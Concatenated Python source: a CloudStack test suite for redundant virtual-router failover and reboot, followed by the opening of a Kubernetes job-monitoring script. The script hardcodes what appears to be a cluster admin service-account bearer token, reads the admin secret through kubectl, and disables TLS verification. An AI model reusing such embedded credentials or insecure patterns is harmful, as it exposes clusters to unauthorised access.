# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# 2. listRouters in above network
# 3. deployVM in above user account in the created network
# 4. login to both Redundant Routers
# 5. login to user VM
# 6. delete user account
# Validate the following:
# 1. listNetworks lists network in Allocated state
# 2. listRouters lists no routers created yet
# 3. listRouters returns Primary and Backup routers
# 4. ssh in to both routers and verify:
# - PRIMARY router has eth2 with public Ip address
# - BACKUP router has only guest eth0 and link local eth1
# - Broadcast on PRIMARY eth2 is non-zero (not 0.0.0.0)
# - execute checkrouter.sh in the router home directory and check that its
# status is "PRIMARY|BACKUP" as returned by the listRouters API
# 5. DNS of the user VM is set to RedundantRouter Gateway
# (/etc/resolv.conf)
# Check that the default gateway for the guest is the rvr gateway
# and not the guestIp of either of the RvRs
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % network.id)
networks = Network.list(
self.apiclient,
id=network.id,
listall=True
)
self.assertEqual(
isinstance(networks, list),
True,
"List networks should return a valid response for created network"
)
nw_response = networks[0]
self.debug("Network state: %s" % nw_response.state)
self.assertEqual(
nw_response.state,
"Allocated",
"The network should be in allocated state after creation"
)
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
routers,
None,
"Routers should not be spawned when network is in allocated state"
)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(network.id)]
)
self.debug("Deployed VM in network: %s" % network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % network.name)
routers = Router.list(
self.apiclient,
networkid=network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Fetching the host details for double hop into router")
hosts = Host.list(
self.apiclient,
id=primary_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
primary_host = hosts[0]
self.debug("Host for primary router: %s" % primary_host.name)
self.debug("Host for primary router: %s" % primary_host.ipaddress)
hosts = Host.list(
self.apiclient,
id=backup_router.hostid
)
self.assertEqual(
isinstance(hosts, list),
True,
"List hosts should return a valid list"
)
backup_host = hosts[0]
self.debug("Host for backup router: %s" % backup_host.name)
self.debug("Host for backup router: %s" % backup_host.ipaddress)
self.debug(primary_router.linklocalip)
# Check eth2 port for primary router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
primary_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
primary_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
primary_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.debug("Router's public Ip: %s" % primary_router.publicip)
self.assertEqual(
res.count("state UP"),
1,
"PRIMARY router's public interface should be UP"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
# Check eth2 port for backup router
if self.hypervisor.lower() in ('vmware', 'hyperv'):
result = get_process_status(
self.apiclient.connection.mgtSvr,
22,
self.apiclient.connection.user,
self.apiclient.connection.passwd,
backup_router.linklocalip,
'ip addr show eth2',
hypervisor=self.hypervisor
)
else:
result = get_process_status(
backup_host.ipaddress,
22,
self.testdata['configurableData']['host']["username"],
self.testdata['configurableData']['host']["password"],
backup_router.linklocalip,
"ip addr show eth2"
)
res = str(result)
self.debug("Command 'ip addr show eth2': %s" % result)
self.assertEqual(
res.count("state DOWN"),
1,
"BACKUP router's public interface should be DOWN"
)
self.assertEqual(
result.count('brd 0.0.0.0'),
0,
"Broadcast address of eth2 should not be 0.0.0.0"
)
vms = VirtualMachine.list(
self.apiclient,
id=virtual_machine.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List VMs should not return empty response"
)
vm = vms[0]
self.assertNotEqual(
vm.nic[0].gateway,
primary_router.publicip,
"The gateway of user VM should be same as primary router"
)
self.assertNotEqual(
vm.nic[0].gateway,
backup_router.publicip,
"The gateway of user VM should be same as backup router"
)
return
class TestRvRRedundancy(cloudstackTestCase):
@classmethod
def setUpClass(cls):
cls.testClient = super(TestRvRRedundancy, cls).getClsTestClient()
cls.api_client = cls.testClient.getApiClient()
cls.testdata = cls.testClient.getParsedTestDataConfig()
# Get Zone, Domain and templates
cls.domain = get_domain(cls.api_client)
cls.zone = get_zone(cls.api_client, cls.testClient.getZoneForTests())
cls.template = get_template(
cls.api_client,
cls.zone.id,
cls.testdata["ostype"]
)
cls.testdata["small"]["zoneid"] = cls.zone.id
cls.testdata["small"]["template"] = cls.template.id
cls._cleanup = []
cls.service_offering = ServiceOffering.create(
cls.api_client,
cls.testdata["service_offering"]
)
cls._cleanup.append(cls.service_offering)
cls.network_offering = NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls.network_offering_for_update=NetworkOffering.create(
cls.api_client,
cls.testdata["nw_off_isolated_RVR"],
conservemode=True
)
cls._cleanup.append(cls.network_offering_for_update)
cls._cleanup.append(cls.network_offering)
# Enable Network offering
cls.network_offering.update(cls.api_client, state='Enabled')
cls.network_offering_for_update.update(cls.api_client, state='Enabled')
return
@classmethod
def tearDownClass(cls):
try:
# Cleanup resources used
cleanup_resources(cls.api_client, cls._cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
def setUp(self):
self.apiclient = self.testClient.getApiClient()
self.dbclient = self.testClient.getDbConnection()
self.cleanup = []
self.account = Account.create(
self.apiclient,
self.testdata["account"],
admin=True,
domainid=self.domain.id
)
self.cleanup.insert(0, self.account)
# Creating network using the network offering created
self.debug("Creating network with network offering: %s" %
self.network_offering.id)
self.network = Network.create(
self.apiclient,
self.testdata["network"],
accountid=self.account.name,
domainid=self.account.domainid,
networkofferingid=self.network_offering.id,
zoneid=self.zone.id
)
self.debug("Created network with ID: %s" % self.network.id)
self.debug("Deploying VM in account: %s" % self.account.name)
# Spawn an instance in that network
self.virtual_machine = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
return
def tearDown(self):
try:
cleanup_resources(self.apiclient, self.cleanup)
except Exception as e:
raise Exception("Warning: Exception during cleanup : %s" % e)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_01_stopPrimaryRvR(self):
"""Test stop primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is Primary. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN, and the old BACKUP router as
# new PRIMARY
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the PRIMARY router")
try:
Router.stop(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the primary router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old PRIMARY router")
try:
Router.start(self.apiclient, id=primary_router.id)
self.debug("old PRIMARY router started")
except Exception as e:
self.fail("Failed to start primary router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_02_stopBackupRvR(self):
"""Test stop backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stopRouter that is BACKUP. Router goes to stopped state
# successfully
# 6. listRouters in the account and in the network. Lists old PRIMARY
# router in redundantstate=UNKNOWN
# 7. start the stopped router. Stopped rvr starts up successfully and
# is in Running state
# 8. listRouters in the account and in the network. Router shows up as
# BACKUP and NOT PRIMARY, should have only one BACKUP and one PRIMARY
# at the end, public IP of the SourceNAT should remain same after
# reboot
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Stopping the BACKUP router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop backup router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.debug("Starting the old BACKUP router")
try:
Router.start(self.apiclient, id=backup_router.id)
self.debug("old BACKUP router started")
except Exception as e:
self.fail("Failed to stop primary router: %s" % e)
# wait for VR to start and update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return backup router"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.assertEqual(
backup_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_03_rebootPrimaryRvR(self):
"""Test reboot primary RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is PRIMARY. Router reboots state
# successfully
# 6. lists old PRIMARY router in redundantstate=BACKUP and the old
# BACKUP router as new PRIMARY + public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the primary router")
try:
Router.reboot(self.apiclient, id=primary_router.id)
except Exception as e:
self.fail("Failed to reboot PRIMARY router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_04_rebootBackupRvR(self):
"""Test reboot backup RVR
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. reboot router that is BACKUP. Router reboots state
# successfully
# 6. lists old BACKUP router in redundantstate=BACKUP, and the old
# PRIMARY router is still PRIMARY+ public IP of the SourceNAT should
# remain same after the reboot
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
else:
primary_router = routers[1]
backup_router = routers[0]
self.debug("Rebooting the backup router")
try:
Router.reboot(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to reboot BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
self.debug(
"Checking state of the Primary router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=primary_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'PRIMARY',
"Redundant state of the router should be PRIMARY but is %s" %
routers[0].redundantstate)
self.assertEqual(
primary_router.publicip,
routers[0].publicip,
"Public IP should be same after reboot"
)
return
@attr(tags=["advanced", "advancedns", "ssh"])
def test_05_stopBackupRvR_startInstance(self):
"""Test stop backup RVR and start instance
"""
# Steps to validate
# 1. createNetwork using network offering for redundant virtual router
# listNetworks returns the allocated network
# 2. listRouters in above network. Lists no routers in the created
# network
# 3. deployVM in above user account in the created network. VM is
# successfully Running
# 4. listRouters that has redundantstate=PRIMARY. only one router is
# returned with redundantstate = PRIMARY for this network
# 5. stop router that is BACKUP.
# 6. listRouters in the account and in the network
# 7. deployVM in the user account in the created network
# 8. listRouters in the account and in the network
# 9. delete the account
self.debug("Listing routers for network: %s" % self.network.name)
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
len(routers),
2,
"Length of the list router should be 2 (Backup & Primary)"
)
if routers[0].redundantstate == 'PRIMARY':
backup_router = routers[1]
else:
backup_router = routers[0]
self.debug("Stopping the backup router")
try:
Router.stop(self.apiclient, id=backup_router.id)
except Exception as e:
self.fail("Failed to stop BACKUP router: %s" % e)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertIn(
routers[0].redundantstate, [
'UNKNOWN', 'FAULT'], "Redundant state of the backup router\
should be UNKNOWN/FAULT but is %s" %
routers[0].redundantstate)
# Spawn an instance in that network
vm_2 = VirtualMachine.create(
self.apiclient,
self.testdata["small"],
accountid=self.account.name,
domainid=self.account.domainid,
serviceofferingid=self.service_offering.id,
networkids=[str(self.network.id)]
)
self.debug("Deployed VM in network: %s" % self.network.id)
vms = VirtualMachine.list(
self.apiclient,
id=vm_2.id,
listall=True
)
self.assertEqual(
isinstance(vms, list),
True,
"List Vms should return a valid list"
)
vm = vms[0]
self.assertEqual(
vm.state,
"Running",
"Vm should be in running state after deployment"
)
# wait for VR to update state
time.sleep(self.testdata["sleep"])
self.debug(
"Checking state of the backup router in %s" %
self.network.name)
routers = Router.list(
self.apiclient,
id=backup_router.id,
listall=True
)
self.assertEqual(
isinstance(routers, list),
True,
"list router should return Primary and backup routers"
)
self.assertEqual(
routers[0].redundantstate,
'BACKUP',
"Redundant state of the router should be BACKUP but is %s" %
routers[0].redundantstate)
return
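# Helper run in a worker process: switch self.network to the second RVR offering
# with updateinsequence=True; success or failure is reported back over the pipe 'conn'.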
def updateNetwork(self, conn):
try:
self.network.update(
self.api_client,
networkofferingid=self.network_offering_for_update.id,
updateinsequence=True,
forced=True,
changecidr=False
)
except Exception as e:
conn.send("Failed to update network: %s due to %s"%(self.network.name, e))
conn.send("update Network Complete")
return
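# Poll listRouters for this network (up to 4 attempts) until two routers exist and
# one of them reports redundantstate PRIMARY; returns the (primary, backup) pair.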
def get_primary_and_backupRouter(self):
retry = 4
primary_router = backup_router = None
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
if len(routers) < 2:
continue
if not (routers[0].redundantstate == 'PRIMARY' or routers[1].redundantstate == 'PRIMARY'):
continue
if routers[0].redundantstate == 'PRIMARY':
primary_router = routers[0]
backup_router = routers[1]
break
else:
primary_router = routers[1]
backup_router = routers[0]
break
self.info("primary_router: %s, backup_router: %s" % (primary_router, backup_router))
return primary_router, backup_router
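# Wait (up to 4 sleep cycles) until the backup router name differs from the old
# backup router, i.e. the replacement router has been created; fail the test on timeout.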
def chek_for_new_backupRouter(self,old_backup_router):
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
self.info("Checking if new router is getting created.")
self.info("old_backup_router:"+old_backup_router.name+" new_backup_router:"+backup_router.name)
while old_backup_router.name == backup_router.name:
self.debug("waiting for new router old router:"+backup_router.name)
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("New router creation taking too long, timed out")
def wait_untill_router_stabilises(self):
retry=4
while retry > 0:
routers = Router.list(
self.apiclient,
networkid=self.network.id,
listall=True
)
retry = retry-1
self.info("waiting untill state of the routers is stable")
if routers[0].redundantstate != 'UNKNOWN' and routers[1].redundantstate != 'UNKNOWN':
return
elif retry == 0:
self.fail("timed out while waiting for routers to stabilise")
return
time.sleep(self.testdata["sleep"])
@attr(tags=["bharat"])
def test_06_updateVRs_in_sequence(self):
"""Test update network and check if VRs are updated in sequence
"""
# Steps to validate
# update network to a new offering
# check if the primary router is running while backup is starting.
# check if the backup is running while primary is starting.
# check if both the routers are running after the update is complete.
# clean up the network to make sure it is in a proper state.
self.network.restart(self.apiclient,cleanup=True)
time.sleep(self.testdata["sleep"])
self.wait_untill_router_stabilises()
old_primary_router, old_backup_router = self.get_primary_and_backupRouter()
self.info("old_primary_router:"+old_primary_router.name+" old_backup_router"+old_backup_router.name)
#chek if the network is in correct state
self.assertEqual(old_primary_router.state, "Running", "The primary router is not running, network is not in a correct state to start the test")
self.assertEqual(old_backup_router.state, "Running", "The backup router is not running, network is not in a correct state to start the test")
worker, monitor = multiprocessing.Pipe()
worker_process = multiprocessing.Process(target=self.updateNetwork, args=(worker,))
worker_process.start()
if not worker_process.is_alive():
message = monitor.recv()
if "Complete" not in message:
self.fail(message)
self.info("Network update Started, the old backup router will get destroyed and a new router will be created")
self.chek_for_new_backupRouter(old_backup_router)
primary_router, new_backup_router=self.get_primary_and_backupRouter()
# the primary router should stay in the Running state while the backup is being updated
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
self.info("Old backup router:"+old_backup_router.name+" is destroyed and new router:"+new_backup_router.name+" got created")
#wait for the new backup to become primary.
retry = 4
while new_backup_router.name != primary_router.name:
retry = retry-1
if retry == 0:
break
time.sleep(self.testdata["sleep"])
self.info("wating for backup router to become primary router name:"+new_backup_router.name)
primary_router, backup_router = self.get_primary_and_backupRouter()
if retry == 0:
self.fail("timed out while waiting for new backup router to change state to PRIMARY.")
#new backup router has become primary.
self.info("newly created router:"+new_backup_router.name+" has changed state to Primary")
self.info("old primary router:"+old_primary_router.name+"is destroyed")
#old primary will get destroyed and a new backup will be created.
#wait until new backup changes state from unknown to backup
primary_router, backup_router = self.get_primary_and_backupRouter()
retry = 4
while backup_router.redundantstate != 'BACKUP':
retry = retry-1
self.info("waiting for router:"+backup_router.name+" to change state to Backup")
if retry == 0:
break
time.sleep(self.testdata["sleep"])
primary_router, backup_router = self.get_primary_and_backupRouter()
self.assertEqual(primary_router.state, "Running", "State of the primary router is not running")
self.assertEqual(primary_router.redundantstate, 'PRIMARY', "Redundant state of the primary router should be PRIMARY, but it is %s"%primary_router.redundantstate)
if retry == 0:
self.fail("timed out while waiting for new backup rotuer to change state to PRIMARY.")
# the network update is complete; finally both routers should be running.
new_primary_router, new_backup_router=self.get_primary_and_backupRouter()
self.assertEqual(new_primary_router.state, "Running", "State of the primary router:"+new_primary_router.name+" is not running")
self.assertEqual(new_backup_router.state, "Running", "State of the backup router:"+new_backup_router.name+" is not running")
worker_process.join()
|
random_job3_saves.py
|
import task_submit
from task_submit import VGGTask,RESTask,RETask,DENTask,XCETask
import random
import kubernetes
import influxdb
import yaml
import requests
from multiprocessing import Process
import multiprocessing
import urllib
import urllib3
import time
import numpy as np
np.set_printoptions(suppress=True)  # set numpy print options (suppress scientific notation)
import os
import json
import math
import pandas as pd
import argparse
from pytz import UTC
from dateutil import parser
from datetime import datetime
import psutil
import socket
from max_heap import MaxHeap
import worker_queue
# from worker_queue import value_free_load,value_weight_load
from Global_client import Global_Influx
aToken = 'eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJhZG1pbi11c2VyLXRva2VuLTJ3dGRuIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXVzZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiI5YWE4ZTc4OS0zODM1LTExZWEtYWZlMi1mYTE2M2UzMzBlYWEiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06YWRtaW4tdXNlciJ9.qzHVo1KysWhnSAMwKAcaKLWkqOxBlSBr7qR4LtldusdM0Z9dDQVH2TMmtvmkBDyfqVKQttMmTGXDHhW-dOD9uJVn8w84zitd7eAgVCrHm2nhTMbsf2ZKH0DuU6t_SGYkyBWVIedMpZis-K2mzCjmSq5TAd67cMSCqGHQVMtjEsqpPyBeY_nrqgzWWwX3X3E0hHGk7CvICndFiqUeI9xKVluA-TdR6HzPXbaCIGAcvSHeIlc4GdhmDTJ47U4rQON3IL0dhC6Adom7c65I5pwBdYpfqkDhKld1o7ErhXS8Qhcv0BHhfuj-Bdn6MMsH7PXpH-7I5dxoKDVlTC-q7KV9EQ'
aTokenw = 'eyJhbGciOiJSUzI1NiIsImtpZCI6IiJ9.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJrdWJlLXN5c3RlbSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VjcmV0Lm5hbWUiOiJhZG1pbi11c2VyLXRva2VuLTJ3dGRuIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6ImFkbWluLXVzZXIiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiI5YWE4ZTc4OS0zODM1LTExZWEtYWZlMi1mYTE2M2UzMzBlYWEiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6a3ViZS1zeXN0ZW06YWRtaW4tdXNlciJ9.qzHVo1KysWhnSAMwKAcaKLWkqOxBlSBr7qR4LtldusdM0Z9dDQVH2TMmtvmkBDyfqVKQttMmTGXDHhW-dOD9uJVn8w84zitd7eAgVCrHm2nhTMbsf2ZKH0DuU6t_SGYkyBWVIedMpZis-K2mzCjmSq5TAd67cMSCqGHQVMtjEsqpPyBeY_nrqgzWWwX3X3E0hHGk7CvICndFiqUeI9xKVluA-TdR6HzPXbaCIGAcvSHeIlc4GdhmDTJ47U4rQON3IL0dhC6Adom7c65I5pwBdYpfqkDhKld1o7ErhXS8Qhcv0BHhfuj-Bdn6MMsH7PXpH-7I5dxoKDVlTC-q7KV9EQ'
LOSSHOST = '192.168.128.21'
LOSSPORT = 12527
def parse():
parser = argparse.ArgumentParser(description="Node Monitor")
parser.add_argument('--save_path', default='/tfdata/nodedata', help='save path')
parser.add_argument('--database',default="NODEMESSAGE",help="save database")
parser.add_argument('--derivation',default=10,help='sampling rate')
parser.add_argument('--measurement',default="NODEMESSAGE",help="save measurement")
# parser.add_argument('--train_pg', action='store_true', help='whether train policy gradient')
# parser.add_argument('--train_dqn', action='store_true', help='whether train DQN')
# parser.add_argument('--test_pg', action='store_true', help='whether test policy gradient')
# parser.add_argument('--test_dqn', action='store_true', help='whether test DQN')
args = parser.parse_args()
return args
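# Refresh the bearer token by shelling out to kubectl and reading the
# admin-user service-account secret from the kube-system namespace.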
def update_token():
cacheData = os.popen(
"echo $(kubectl describe secret $(kubectl get secret -n kube-system | grep ^admin-user | awk '{print $1}') -n kube-system | grep -E '^token'| awk '{print $2}')").read()
cacheToken = cacheData[:-1]
newToken = str(cacheToken)
return newToken
def make_headers(Token):
text = 'Bearer ' + Token
headers = {'Authorization': text}
return headers
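# Fetch a metrics API endpoint with a freshly refreshed bearer token; TLS
# verification is disabled and the parsed JSON body is returned.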
def catch_message(url):
global aToken
aToken = update_token()
headers = make_headers(aToken)
response = requests.get(url,headers=headers,verify=False)
res_json = response.json()
return res_json
def database_create(databasename):
database_list = Global_Influx.Client_all.get_list_database()
creating = True
for db in database_list:
dbl = list(db.values())
if databasename in dbl:
creating = False
break
if creating:
Global_Influx.Client_all.create_database(databasename)
# Global_Influx.Client_all.create_database(databasename)
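# Convert a metrics-server CPU usage string (apparently nanocores, e.g. '123456789n')
# to millicores by stripping the unit suffix and rounding up after dividing by 1e6.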
def match_cpu(raw_data):
cache = raw_data[:-1]
matched_data = math.ceil(int(cache)/1e6)
return matched_data
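# Convert a memory usage string with a two-character unit suffix (e.g. '123456Ki')
# to MiB by dropping the suffix and rounding up after dividing by 1024.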
def match_memory(raw_data):
cache = raw_data[:-2]
